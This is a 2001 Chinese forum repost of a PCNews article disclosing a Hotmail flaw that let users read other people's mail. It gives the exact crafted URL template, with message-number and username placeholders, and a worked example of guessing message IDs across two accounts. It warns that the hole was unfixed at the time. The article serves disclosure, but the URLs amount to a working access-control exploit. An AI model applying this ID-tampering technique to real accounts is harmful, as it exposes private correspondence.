发信人: xmzw(小米粥)
整理人: starseacn(2001-09-06 11:01:56), 站内信件
|
(www.pcnews.com.cn 专稿 张永刚)近日,一位Hotmail用户发现,通过简单的更改地址中的邮件编号等信息就可以浏览它人的邮件内容。由于邮件编号都有一定的规则,所以很容易猜出来。要完成此项工作,你必须拥有2个Hotmail信箱。
用于偷看他人邮件的地址为:
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd? _lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSGXXXXXXXXX% 2e(X)X%26start%3d1%26len%3d99999999999%26login% 3dUSERNAME%26domain%3dhotmail%2ecom
其中XXXXXXXXX为邮件编号,USERNAME为用户账号,(X)X为介于0和59之间的第二编码。
比如说,你有一个名为[email protected]的信箱。首先登录此信箱,打开任何一封邮件,此时地址栏中的地址将是:
http://lw2fd.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a=5691b2b
44e104176111971aa0fbb1274&msg=MSG998000947.3&start=197078&len=1060&msgre
ad=1&mfs=182
这封电子邮件的编号就是MSG998000947.3。把地址拷贝下来,注销。然后登录另一个信箱。把刚才的那封邮件的编号和账号插入地址栏:
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%
2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998000947%2e3%26
start%3d1%26len%3d99999999999%26login% 3dr00tarded%26domain%3dhotmail%2ecom
回车。看到什么了?对,[email protected]中的那封邮件的内容。
提请广大Hotmail用户注意,此漏洞到本站发稿时为止仍未修复。
|
|